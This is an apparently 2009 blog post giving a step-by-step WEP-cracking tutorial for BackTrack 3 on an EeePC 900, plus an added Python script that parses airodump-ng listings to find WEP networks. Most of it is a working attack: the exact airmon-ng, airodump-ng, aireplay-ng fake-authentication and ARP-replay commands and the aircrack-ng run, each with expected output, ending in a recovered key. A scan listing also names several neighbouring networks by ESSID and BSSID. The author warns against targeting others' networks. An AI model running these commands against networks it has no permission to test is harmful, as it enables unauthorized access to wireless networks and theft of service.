Wednesday 9 September 2009

Backtrack 3 Final On The 900

This is a simple guide to cracking WEP.

First off, this guide is for the EeePC 900 using BackTrack 3 Final, live, from a USB drive. I cannot guarantee that it will work with your machine.

Second, I am not an expert, so don’t start firing questions at me.

Third, this guide is a simplified version of several tutorials I have read.

Fourth, I have used this guide successfully a number of times, so I know it works for me.

Fifth, type carefully. One tiny mistake = Much hair pulling.

Lastly, cracking other people’s WEP keys and using their bandwidth without permission is theft and is illegal in the UK and many other countries.

So don't do it.

Please, use this guide wisely…

__________________________________________________________________

__________________________________________________________________

LET’S FIND A NETWORK TO CRACK!!

__________________________________________________________________

Open a terminal. Enter:

airodump-ng start ath0

The reply should look similar to this:

CH 8 ][ Elapsed: 8 s ][ 2009-06-09 12:11

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:22:3F:37:AC:0E 2 3 0 0 6 54 WPA TKIP PSK madangupta
00:1F:9F:43:78:65 3 4 0 0 11 54 WEP WEP Thomson12BAE8
00:1A:C4:D0:26:A1 6 6 0 0 5 54. WEP WEP BTBusinessHub-246
00:1A:C4:D0:26:A3 6 9 0 0 5 54. WPA TKIP PSK BT Fusion-3246
00:14:7F:DC:1A:13 24 22 0 0 6 54 WEP WEP Johnsrouter
00:1D:68:09:A6:93 20 23 0 0 1 54 WEP WEP BTHomeHub-17CE

BSSID STATION PWR Rate Lost Packets Probes

Then note the details of the network you want to use. Remember, it's WEP encryption we're looking for. A PWR rating of 20 and above is usually strong enough for packet injection to work, more of which later. The details you will need are the ESSID, BSSID and channel number.
Then hit Ctrl+C to stop airodump.
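An added helper (my own example, not part of the original post) that reads an airodump-ng listing in the collapsed-whitespace layout shown above and pulls out the ESSID, BSSID and channel of every network still on WEP, which is the list you want when checking your own access points for legacy encryption. It also flags a WEP access point whose "#/s" column is unusually high, since an idle home router sits near 0 while the ARP replay described later in this post pushes the rate to 100-500 frames per second. The sample listing is constructed from the rows on this page.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the layout this post's airodump-ng listings use
# (whitespace collapsed); the last AP row is from the "while injecting" view.
SCAN = """\
CH 8 ][ Elapsed: 8 s ][ 2009-06-09 12:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:22:3F:37:AC:0E 2 3 0 0 6 54 WPA TKIP PSK madangupta
00:1F:9F:43:78:65 3 4 0 0 11 54 WEP WEP Thomson12BAE8
00:1A:C4:D0:26:A3 6 9 0 0 5 54. WPA TKIP PSK BT Fusion-3246
00:14:7F:DC:1A:13 42 100 5240 178307 338 6 54 WEP WEP Johnsrouter
BSSID STATION PWR Lost Packets Probes
00:14:7F:DC:1A:13 00:0F:B5:88:AC:82 42 0 183782
"""

# One access-point row. RXQ only appears in the per-BSSID view and AUTH is
# blank for WEP, so both are optional; the ESSID may contain spaces.
AP_ROW = re.compile(
    r"^(?P<bssid>(?:[0-9A-F]{2}:){5}[0-9A-F]{2})\s+(?P<pwr>-?\d+)\s+"
    r"(?:(?P<rxq>\d+)\s+)?(?P<beacons>\d+)\s+(?P<data>\d+)\s+(?P<rate>\d+)\s+"
    r"(?P<ch>\d+)\s+(?P<mb>[\d.]+)\s+(?P<enc>OPN|WEP|WPA2?)"
    r"(?:\s+(?P<cipher>WEP|TKIP|CCMP)\b)?(?:\s+(?P<auth>PSK|MGT|SKA)\b)?"
    r"\s*(?P<essid>.*)$",
    re.IGNORECASE,
)


def parse_aps(text: str) -> List[Dict[str, str]]:
    """Return one dict per access-point row; headers and station rows are skipped."""
    return [m.groupdict() for m in map(AP_ROW.match, (l.strip() for l in text.splitlines())) if m]


def wep_networks(aps: List[Dict[str, str]]) -> List[Tuple[str, str, int]]:
    """(BSSID, ESSID, channel) of every AP still using WEP: the ones to re-key to WPA2."""
    return [(a["bssid"], a["essid"], int(a["ch"])) for a in aps if a["enc"].upper() == "WEP"]


def replay_suspects(aps: List[Dict[str, str]], rate_threshold: int = 100) -> List[str]:
    """WEP APs whose data rate (#/s) is at or above the post's low end for ARP replay."""
    return [a["bssid"] for a in aps
            if a["enc"].upper() == "WEP" and int(a["rate"]) >= rate_threshold]


if __name__ == "__main__":
    found = parse_aps(SCAN)
    print("WEP networks:", wep_networks(found))
    print("Possible replay traffic:", replay_suspects(found))
```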

The network I am going to be attempting to crack is my own. Because it's legal.

Cracking anything other is illegal.

So don't fuck about.

The following are my details.
ESSID: Johnsrouter
BSSID: 00:14:7F:DC:1A:13
Channel: 6
My wireless card’s Mac address: 00:0F:B5:88:AC:82 (you will find yours later).

__________________________________________________________________

__________________________________________________________________

LET’S GO!!

__________________________________________________________________

STEP 1 - Start the wireless card in monitor mode on the same channel as the access point.

Open a terminal. Enter:

airmon-ng stop ath0

The system should reply:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter:

iwconfig

The reply should look similar to this:

lo no wireless extensions.

eth0 no wireless extensions.

wifi0 no wireless extensions.

Now, enter the following command to start the wireless card in monitor mode on channel 6:

airmon-ng start wifi0 6

Replace the 6 with whatever channel your access point is using.

The reply should look similar to this:

Interface Chipset Driver

wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

Enter:

iwconfig

The reply should look similar to this:

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0

Here, you should make a note of your wireless card's MAC address (the Access Point field shown in monitor mode). You can see mine above: 00:0F:B5:88:AC:82

__________________________________________________________________

__________________________________________________________________

STEP 2 - Test Wireless Device Packet Injection

Now to make sure you’re able to use packet injection.

Enter:

aireplay-ng -9 -e Johnsrouter -a 00:14:7F:DC:1A:13 ath0

Where:
-9 means injection test
-e Johnsrouter is the wireless network name (replace it with yours)
-a 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)

The reply should look similar to this:

09:23:35 Waiting for beacon frame (BSSID: 00:14:7F:DC:1A:13) on channel 6
09:23:35 Trying broadcast probe requests…
09:23:35 Injection is working!
09:23:37 Found 1 AP

09:23:37 Trying directed probe requests…
09:23:37 00:14:7F:DC:1A:13 - channel: 6 - ‘Johnsrouter’
09:23:39 Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73
09:23:39 30/30: 100%

On the last line it says 100%. You need a high percentage for successful injection.
If it’s quite low, you may be too far from the access point for injection to work.

__________________________________________________________________

__________________________________________________________________

STEP 3 - Start airodump-ng to capture the IVs

The purpose of this step is to capture the IVs generated.

Open a new terminal.

Enter:

airodump-ng -c 6 --bssid 00:14:7F:DC:1A:13 -w output ath0

Where:

-c 6 is the channel for the wireless network (replace it with yours).
--bssid 00:14:7F:DC:1A:13 is the access point's MAC address (replace it with yours). Yes, it is a double hyphen for this one.
-w output is the file name prefix for the capture files which will contain the IVs (the output*.cap files used in Step 6).

While the injection is taking place (later), the reply should look similar to this:

CH 6 ][ Elapsed: 11 mins ][ 2009-06-09 12:15

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:7F:DC:1A:13 42 100 5240 178307 338 6 54 WEP WEP Johnsrouter

BSSID STATION PWR Lost Packets Probes

00:14:7F:DC:1A:13 00:0F:B5:88:AC:82 42 0 183782

__________________________________________________________________

__________________________________________________________________

STEP 4 - Use aireplay-ng to do a fake authentication with the access point

Open a new terminal.

Enter:

aireplay-ng -1 0 -e Johnsrouter -a 00:14:7F:DC:1A:13 -h 00:0F:B5:88:AC:82 ath0

Where:

-1 means fake authentication
0 is the reassociation timing in seconds
-e Johnsrouter is the wireless network name (replace it with yours)
-a 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)
-h 00:0F:B5:88:AC:82 is our card's MAC address (replace it with yours)

The reply should look similar to this:

18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful

_________________________________________________________________

_________________________________________________________________

STEP 5 - Start aireplay-ng in ARP request replay mode

Open a new terminal.

Enter:

aireplay-ng -3 -b 00:14:7F:DC:1A:13 -h 00:0F:B5:88:AC:82 ath0

Where:

-b 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours)
-h 00:0F:B5:88:AC:82 is our card's MAC address (replace it with yours)

The reply should look similar to this:

Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 629399 packets (got 316283 ARP requests), sent 210955 packets…

You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The "#/s" should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can be as low as 100/second and as high as 500/second.

__________________________________________________________________

__________________________________________________________________

STEP 6 - Run aircrack-ng to obtain the WEP key

The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.

Open a new terminal.

Enter:

aircrack-ng -z -b 00:14:7F:DC:1A:13 output*.cap

Where:

-z invokes the PTW WEP-cracking method.
-b 00:14:7F:DC:1A:13 is the access point MAC address (replace it with yours).

Generally, you will need about 20,000 packets for a 64-bit key and between 40,000 and 85,000 packets for a 128-bit key.
This can vary wildly, so be patient.

This output can run to a few pages and it may stop, telling you that it will attempt again.
Again, be patient.

The reply (if successful) should look similar to this:

Aircrack-ng 0.9

[00:03:06] Tested 674449 keys (got 96610 IVs)

KB depth byte(vote)
0 0/ 9 12( 15) F9( 15) 47( 12) F7( 12) FE( 12) 1B( 5) 77( 5) A5( 3) F6( 3) 03( 0)
1 0/ 8 34( 61) E8( 27) E0( 24) 06( 18) 3B( 16) 4E( 15) E1( 15) 2D( 13) 89( 12) E4( 12)
2 0/ 2 56( 87) A6( 63) 15( 17) 02( 15) 6B( 15) E0( 15) AB( 13) 0E( 10) 17( 10) 27( 10)
3 1/ 5 78( 43) 1A( 20) 9B( 20) 4B( 17) 4A( 16) 2B( 15) 4D( 15) 58( 15) 6A( 15) 7C( 15)

KEY FOUND! [ 12:34:56:78:90 ]
Probability: 100%

So, the key is:
[ 12:34:56:78:90 ]

Remove the brackets and colons so the key looks like this:
1234567890

and that’s the key you enter when asked for the WEP key by your wireless manager.
